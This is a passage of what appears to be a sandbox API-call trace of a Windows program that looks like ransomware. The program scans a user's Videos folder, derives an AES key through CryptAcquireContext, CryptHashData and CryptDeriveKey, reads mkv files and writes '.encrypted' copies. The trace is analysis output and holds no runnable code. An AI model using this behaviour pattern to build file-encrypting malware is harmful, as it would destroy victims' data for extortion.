lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mRin.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.549] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.549] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.549] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65773250, ftCreationTime.dwHighDateTime=0x1d5b807, ftLastAccessTime.dwLowDateTime=0x1244f2b0, ftLastAccessTime.dwHighDateTime=0x1d5b948, ftLastWriteTime.dwLowDateTime=0x1244f2b0, ftLastWriteTime.dwHighDateTime=0x1d5b948, nFileSizeHigh=0x0, nFileSizeLow=0x18f35, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="mRin.mkv", cAlternateFileName="")) returned 0x7c2240 [0042.550] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.550] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.550] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.551] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.552] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.552] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.552] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.552] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.552] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.553] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0042.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.553] CryptDestroyHash (hHash=0x7c2100) returned 1 [0042.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\mrin.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.553] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.553] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.553] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.555] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\mrin.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0042.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0042.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0042.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.557] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.557] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0042.560] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x8f35, lpOverlapped=0x0) returned 1 [0042.561] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18f35) returned 0xac2018 [0042.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18f35) returned 0x935008 [0042.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.565] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18f35) returned 0xac2018 [0042.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.566] HeapFree (in: hHeap=0x770000, 